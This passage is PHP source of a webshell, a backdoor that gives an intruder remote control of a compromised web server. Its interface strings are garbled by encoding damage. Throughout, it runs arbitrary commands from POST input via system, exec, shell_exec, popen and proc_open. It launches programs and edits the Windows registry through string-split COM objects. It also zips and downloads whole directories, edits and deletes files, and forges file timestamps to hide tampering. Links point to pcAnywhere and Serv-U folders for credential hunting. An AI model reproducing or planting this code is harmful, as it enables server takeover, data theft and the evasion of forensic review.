echo "<22><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>,<2C><>ȷ<EFBFBD><C8B7>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD>п<EFBFBD>дȨ<D0B4><C8A8>!";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
elseif($downrar) {
|
|||
|
if (!empty($dl)) {
|
|||
|
if(eregi("unzipto:",$localfile)){
|
|||
|
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
|
|||
|
$zip = new Zip;
|
|||
|
$zipfile=$dir."/".$dl[0];
|
|||
|
$array=$zip->get_list($zipfile);
|
|||
|
$count=count($array);
|
|||
|
$f=0;
|
|||
|
$d=0;
|
|||
|
for($i=0;$i<$count;$i++) {
|
|||
|
if($array[$i][folder]==0) {
|
|||
|
if($zip->Extract($zipfile,$path,$i)>0) $f++;
|
|||
|
}
|
|||
|
else $d++;
|
|||
|
}
|
|||
|
if($i==$f+$d) echo "$dl[0] <20><>ѹ<EFBFBD><D1B9>".$path."<22>ɹ<EFBFBD><br>($f <20><><EFBFBD>ļ<EFBFBD> $d <20><>Ŀ¼)";
|
|||
|
elseif($f==0) echo "$dl[0] <20><>ѹ<EFBFBD><D1B9>".$path."ʧ<><CAA7>";
|
|||
|
else echo "$dl[0] δ<><CEB4>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><br>(<28>ѽ<EFBFBD>ѹ $f <20><><EFBFBD>ļ<EFBFBD> $d <20><>Ŀ¼)";
|
|||
|
}else{
|
|||
|
$zipfile="";
|
|||
|
$zip = new Zip;
|
|||
|
for($k=0;isset($dl[$k]);$k++)
|
|||
|
{
|
|||
|
$zipfile=$dir."/".$dl[$k];
|
|||
|
if(is_dir($zipfile))
|
|||
|
{
|
|||
|
unset($zipfilearray);
|
|||
|
addziparray($dl[$k]);
|
|||
|
for($i=0;$zipfilearray[$i];$i++)
|
|||
|
{
|
|||
|
$filename=$zipfilearray[$i];
|
|||
|
$filesize=@filesize($dir."/".$zipfilearray[$i]);
|
|||
|
$fp=@fopen($dir."/".$filename,rb);
|
|||
|
$zipfiles[]=Array($filename,@fread($fp,$filesize));
|
|||
|
@fclose($fp);
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
$filename=$dl[$k];
|
|||
|
$filesize=@filesize($zipfile);
|
|||
|
$fp=@fopen($zipfile,rb);
|
|||
|
$zipfiles[]=Array($filename,@fread($fp,$filesize));
|
|||
|
@fclose($fp);
|
|||
|
}
|
|||
|
}
|
|||
|
$zip->Add($zipfiles,1);
|
|||
|
$code = $zip->get_file();
|
|||
|
$ck = "_QQ44997_".date("Y-m-d",time())."";
|
|||
|
if(empty($localfile)){
|
|||
|
header("Content-type: application/octet-stream");
|
|||
|
header("Accept-Ranges: bytes");
|
|||
|
header("Accept-Length: ".strlen($code));
|
|||
|
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
|
|||
|
echo $code;
|
|||
|
exit;
|
|||
|
}else{
|
|||
|
$fp = @fopen("".$dir."/".$localfile."","w");
|
|||
|
echo $msg=@fwrite($fp,$code) ? "ѹ<><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>".$dir."/".$localfile."<22><><EFBFBD>سɹ<D8B3><C9B9><EFBFBD>!" : "Ŀ¼".$dir."<22><EFBFBD>дȨ<D0B4><C8A8>!";
|
|||
|
@fclose($fp);
|
|||
|
}
|
|||
|
}
|
|||
|
} else {
|
|||
|
echo "<22><>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD><D8B5>ļ<EFBFBD>!";
|
|||
|
}
|
|||
|
}
|
|||
|
// Shell.Application <20><><EFBFBD>г<EFBFBD><D0B3><EFBFBD>
|
|||
|
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
|
|||
|
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
|
|||
|
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
|
|||
|
echo ($a=='0') ? "<22><><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE>ɹ<EFBFBD>ִ<EFBFBD><D6B4>!" : "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
// <20>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4>
|
|||
|
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
|
|||
|
echo "<22><><EFBFBD>ò<EFBFBD><C3B2><EFBFBD> ".$_POST['phpvarname']." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".getphpcfg($_POST['phpvarname'])."";
|
|||
|
}
|
|||
|
// <20><>ȡע<C8A1><D7A2><EFBFBD><EFBFBD>
|
|||
|
elseif(($regread) AND !empty($_POST['readregname'])) {
|
|||
|
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
|
|||
|
var_dump(@$shell->RegRead($_POST['readregname']));
|
|||
|
}
|
|||
|
|
|||
|
// д<><D0B4>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
|||
|
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
|
|||
|
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
|
|||
|
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
|
|||
|
echo ($a=='0') ? "д<><D0B4>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD>ɹ<EFBFBD>!" : "д<><D0B4> ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ<><CAA7>!";
|
|||
|
}
|
|||
|
// ɾ<><C9BE>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
|||
|
elseif(($regdelete) AND !empty($_POST['delregname'])) {
|
|||
|
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
|
|||
|
$a = @$shell->RegDelete($_POST['delregname']);
|
|||
|
echo ($a=='0') ? "ɾ<><C9BE>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD>ɹ<EFBFBD>!" : "ɾ<><C9BE> ".$_POST['delregname']." ʧ<><CAA7>!";
|
|||
|
}
|
|||
|
else {
|
|||
|
echo "$notice";
|
|||
|
echo "<a href=\"?dir=C:/Program%20Files/\">Program</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users/<2F><><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>˵<EFBFBD>/<2F><><EFBFBD><EFBFBD>\"><3E><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD></a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href=\"?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | ";
|
|||
|
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
|
|||
|
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href=\"?dir=$drive/\">$drive\\</a>";}
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
echo "</b></p>\n";
|
|||
|
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><><EFBFBD><EFBFBD> =====================*/
|
|||
|
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
|
|||
|
$tb->tableheader();
|
|||
|
?>
|
|||
|
<tr bgcolor="#cccccc">
|
|||
|
<td align="center" nowrap width="27%"><b><3E>ļ<EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="16%"><b><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="16%"><b><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="11%"><b><3E><>С</b></td>
|
|||
|
<td align="center" nowrap width="6%"><b><3E><><EFBFBD><EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="24%"><b><3E><><EFBFBD><EFBFBD></b></td>
|
|||
|
</tr>
|
|||
|
<FORM action="" method="POST">
|
|||
|
<?php
|
|||
|
// Ŀ¼<C4BF>б<EFBFBD>
|
|||
|
$dirs=@opendir($dir);
|
|||
|
$dir_i = '0';
|
|||
|
while ($file=@readdir($dirs)) {
|
|||
|
$filepath="$dir/$file";
|
|||
|
$a=@is_dir($filepath);
|
|||
|
if($a=="1"){
|
|||
|
if($file!=".." && $file!=".") {
|
|||
|
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
|
|||
|
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
|
|||
|
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td style=\"padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=search&dir=".$filepath."\">Search</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap>| <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','<27><>ȷ<EFBFBD><C8B7>Ҫɾ<D2AA><C9BE> $file Ŀ¼<C4BF><C2BC>? \\n\\n<><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF>ǿ<EFBFBD>,<2C>˴β<CBB4><CEB2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><C9BE><EFBFBD><EFBFBD>Ŀ¼<C4BF>µ<EFBFBD><C2B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>!','1')\">ɾ<><C9BE></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\"><3E><><EFBFBD><EFBFBD></a> |</td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
$dir_i++;
|
|||
|
} else {
|
|||
|
if($file=="..") {
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><3E><><EFBFBD><EFBFBD><EFBFBD>ϼ<EFBFBD>Ŀ¼</a></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}// while
|
|||
|
@closedir($dirs);
|
|||
|
?>
|
|||
|
<tr bgcolor="#cccccc">
|
|||
|
<td colspan="6" height="5"></td>
|
|||
|
</tr>
|
|||
|
<?
|
|||
|
// <20>ļ<EFBFBD><C4BC>б<EFBFBD>
|
|||
|
$dirs=@opendir($dir);
|
|||
|
$file_i = '0';
|
|||
|
while ($file=@readdir($dirs)) {
|
|||
|
$filepath="$dir/$file";
|
|||
|
$a=@is_dir($filepath);
|
|||
|
if($a=="0"){
|
|||
|
$size=@filesize($filepath);
|
|||
|
$size=$size/1024 ;
|
|||
|
$size= @number_format($size, 3);
|
|||
|
if (@filectime($filepath) == @filemtime($filepath)) {
|
|||
|
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
|
|||
|
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
|
|||
|
} else {
|
|||
|
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
|
|||
|
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
|
|||
|
}
|
|||
|
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td style=\"padding-left: 5px;\">";
|
|||
|
echo "<INPUT type=checkbox value=$file name=dl[]>";
|
|||
|
echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
|
|||
|
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\"><3E><><EFBFBD><EFBFBD></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"><3E>༭</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','<27><>ȷ<EFBFBD><C8B7>Ҫɾ<D2AA><C9BE> $file <20>ļ<EFBFBD><C4BC><EFBFBD>?','2')\">ɾ<><C9BE></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\"><3E><><EFBFBD><EFBFBD></a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">ʱ<><CAB1></a></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
$file_i++;
|
|||
|
}
|
|||
|
}// while
|
|||
|
@closedir($dirs);
|
|||
|
if(get_cfg_var('safemode'))$z = "<a href=\"#\" title=\"ʹ<><CAB9>˵<EFBFBD><CBB5>\" onclick=\"alert('PhpΪ<70><CEAA>ȫģʽ<C4A3><CABD><EFBFBD><EFBFBD><EFBFBD>ٴ<EFBFBD><D9B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ű<EFBFBD><C5B1><EFBFBD>ʱ\\n\\n<><6E>д<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڱ<EFBFBD><DAB1>ط<EFBFBD><D8B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD>ء<EFBFBD>')\">(?)</a>";
|
|||
|
else $z = "<a href=\"#\" title=\"ʹ<><CAB9>˵<EFBFBD><CBB5>\" onclick=\"alert('Php<68><70><EFBFBD>зǰ<D0B7>ȫģʽ<C4A3><CABD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȱ<EFBFBD><C8B0>Ȱ<EFBFBD><C8B0>Ȱ<EFBFBD><C8B0><EFBFBD>\\n\\n<><6E>д<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڱ<EFBFBD><DAB1>ط<EFBFBD><D8B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD>ء<EFBFBD>')\">(?)</a>";
|
|||
|
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','ѡ<>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ػر<F2B1BEB5><D8B1><EFBFBD>','','submit').'  '.$z.'</td><td align="right">'.$dir_i.' <20><>Ŀ¼ / '.$file_i.' <20><><EFBFBD>ļ<EFBFBD></td></tr></table>','center',getrowbg(),'','','6');
|
|||
|
|
|||
|
echo "</FORM>\n";
|
|||
|
echo "</table>\n";
|
|||
|
}// end dir
|
|||
|
|
|||
|
elseif ($_GET['action'] == "editfile") {
|
|||
|
if(empty($newfile)) {
|
|||
|
$filename="$dir/$editfile";
|
|||
|
$fp=@fopen($filename,"r");
|
|||
|
$contents=@fread($fp, filesize($filename));
|
|||
|
@fclose($fp);
|
|||
|
$contents=htmlspecialchars($contents);
|
|||
|
}else{
|
|||
|
$editfile=$newfile;
|
|||
|
$filename = "$dir/$editfile";
|
|||
|
}
|
|||
|
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27>½<EFBFBD>/<2F>༭<EFBFBD>ļ<EFBFBD>');
|
|||
|
$tb->tdbody('<27><>ǰ<EFBFBD>ļ<EFBFBD>: '.$tb->makeinput('editfilename',$filename).' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> Php<68><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܻ<EFBFBD><DCBB><EFBFBD>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>php<68><70><EFBFBD>롣\\n\\n<><6E>php<68><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>php<68><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֧<EFBFBD><D6A7>gzinflate<74><65><EFBFBD><EFBFBD><EFBFBD>벻Ҫʹ<D2AA>ã<EFBFBD>\')"> ');
|
|||
|
$tb->tdbody($tb->maketextarea('filecontent',$contents));
|
|||
|
$tb->makehidden('do','doeditfile');
|
|||
|
$tb->formfooter('1','30');
|
|||
|
}//end editfile
|
|||
|
|
|||
|
elseif ($_GET['action'] == "rename") {
|
|||
|
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
|
|||
|
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><EFBFBD><DEB8>ļ<EFBFBD><C4BC><EFBFBD>');
|
|||
|
$tb->makehidden('oldname',$dir."/".$nowfile);
|
|||
|
$tb->makehidden('dir',$dir);
|
|||
|
$tb->tdbody('<27><>ǰ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>: '.basename($nowfile));
|
|||
|
$tb->tdbody('<27><><EFBFBD><EFBFBD>Ϊ: '.$tb->makeinput('newname'));
|
|||
|
$tb->makehidden('do','rename');
|
|||
|
$tb->formfooter('1','30');
|
|||
|
}//end rename
|
|||
|
|
|||
|
elseif ($_GET['action'] == "eval") {
|
|||
|
$action = "?dir=".urlencode($dir)."";
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader(''.$action.' "target="_blank' ,'ִ<><D6B4>php<68>ű<EFBFBD>');
|
|||
|
$tb->tdbody($tb->maketextarea('phpcode',$contents));
|
|||
|
$tb->formfooter('1','30');
|
|||
|
|
|||
|
}
|
|||
|
elseif ($_GET['action'] == "fileperm") {
|
|||
|
$action = "?dir=".urlencode($dir)."&file=".$file;
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><EFBFBD><DEB8>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>');
|
|||
|
$tb->tdbody('<27><EFBFBD> '.$file.' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
|
|||
|
$tb->makehidden('file',$file);
|
|||
|
$tb->makehidden('dir',urlencode($dir));
|
|||
|
$tb->makehidden('do','editfileperm');
|
|||
|
$tb->formfooter('1','30');
|
|||
|
}//end fileperm
|
|||
|
|
|||
|
elseif ($_GET['action'] == "newtime") {
|
|||
|
$action = "?dir=".urlencode($dir);
|
|||
|
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
|
|||
|
$tb->tableheader();
|
|||
|
$tb->formheader($action,'<27><>¡<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>');
|
|||
|
$tb->tdbody("<22><EFBFBD><DEB8>ļ<EFBFBD>: ".$tb->makeinput('curfile',$file,'readonly')." <20><> Ŀ<><C4BF><EFBFBD>ļ<EFBFBD>: ".$tb->makeinput('tarfile','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>'),'center','2','30');
|
|||
|
$tb->makehidden('do','domodtime');
|
|||
|
$tb->formfooter('','30');
|
|||
|
$tb->formheader($action,'<27>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>');
|
|||
|
$tb->tdbody('<br><ul><li><3E><>Ч<EFBFBD><D0A7>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ<EFBFBD>Χ<EFBFBD>ǴӸ<C7B4><D3B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1> 1901 <20><> 12 <20><> 13 <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 20:45:54 <20><> 2038<33><38> 1 <20><> 19 <20><> <20><><EFBFBD>ڶ<EFBFBD> 03:14:07<br>(<28><><EFBFBD><EFBFBD><EFBFBD>ڸ<EFBFBD><DAB8><EFBFBD> 32 λ<>з<EFBFBD><D0B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Сֵ<D0A1><D6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>)</li><li>˵<><CBB5>: <20><>ȡ 01 <20><> 30 ֮<><D6AE>, ʱȡ 0 <20><> 24 ֮<><D6AE>, <20>ֺ<EFBFBD><D6BA><EFBFBD>ȡ 0 <20><> 60 ֮<><D6AE>!</li></ul>','left');
|
|||
|
$tb->tdbody('<27><>ǰ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>: '.$file);
|
|||
|
$tb->makehidden('curfile',$file);
|
|||
|
$tb->tdbody('<27><EFBFBD>Ϊ: '.$tb->makeinput('year','1984','','text','4').' <20><> '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' <20><> '.$tb->makeinput('data','18','','text','2').' <20><> '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' <20><> '.$tb->makeinput('second','00','','text','2').' <20><>','center','2','30');
|
|||
|
$tb->makehidden('do','modmytime');
|
|||
|
$tb->formfooter('1','30');
|
|||
|
}//end newtime
|
|||
|
|
|||
|
elseif ($_GET['action'] == "shell") {
|
|||
|
$action = "??action=shell&dir=".urlencode($dir);
|
|||
|
$tb->tableheader();
|
|||
|
$tb->tdheader('WebShell Mode');
|
|||
|
if (substr(PHP_OS, 0, 3) == 'WIN') {
|
|||
|
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
|
|||
|
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
|
|||
|
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
|
|||
|
$tb->tdbody('<27><EFBFBD><DEBB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>г<EFBFBD><D0B3><EFBFBD> <20><> <20>ļ<EFBFBD>: '.$tb->makeinput('program',$program).' <20><><EFBFBD><EFBFBD>: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
|
|||
|
$tb->makehidden('do','programrun');
|
|||
|
echo "</form>\n";
|
|||
|
}
|
|||
|
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
|
|||
|
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
|
|||
|
$tb->tdbody('<27><>ʾ:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȫ,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD>ļ<EFBFBD>.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Եõ<D4B5>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. ');
|
|||
|
$tb->tdbody('proc_open<65><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>費<EFBFBD><E8B2BB>Ĭ<EFBFBD>ϵ<EFBFBD>winntϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9>,<2C><><EFBFBD><EFBFBD><EFBFBD>ļǵ<C4BC>д<EFBFBD>˳<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>δ<EFBFBD><CEB4><EFBFBD><EFBFBD><EFBFBD>Ľ<EFBFBD><C4BD><EFBFBD>.');
|
|||
|
$tb->tdbody('proc_open<65><6E><EFBFBD><EFBFBD>Ҫʹ<D2AA>õ<EFBFBD>cmd<6D><64><EFBFBD><EFBFBD><EFBFBD><EFBFBD>λ<EFBFBD><CEBB>:'.$tb->makeinput('cmd',$cmd,'','text','30').'(Ҫ<><D2AA><EFBFBD><EFBFBD>linuxϵͳ<CFB5><CDB3><EFBFBD>Ǵ<EFBFBD><C7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC>İ<DEB8>)');
|
|||
|
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
|
|||
|
$tb->tdbody('ѡ<><D1A1>ִ<EFBFBD>к<EFBFBD><D0BA><EFBFBD>: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
|
|||
|
?>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
|
|||
|
if (!empty($_POST['command'])) {
|
|||
|
if ($execfunc=="system") {
|
|||
|
system($_POST['command']);
|
|||
|
} elseif ($execfunc=="passthru") {
|
|||
|
passthru($_POST['command']);
|
|||
|
} elseif ($execfunc=="exec") {
|
|||
|
$result = exec($_POST['command']);
|
|||
|
echo $result;
|
|||
|
} elseif ($execfunc=="shell_exec") {
|
|||
|
$result=shell_exec($_POST['command']);
|
|||
|
echo $result;
|
|||
|
} elseif ($execfunc=="popen") {
|
|||
|
$pp = popen($_POST['command'], 'r');
|
|||
|
$read = fread($pp, 2096);
|
|||
|
echo $read;
|
|||
|
pclose($pp);
|
|||
|
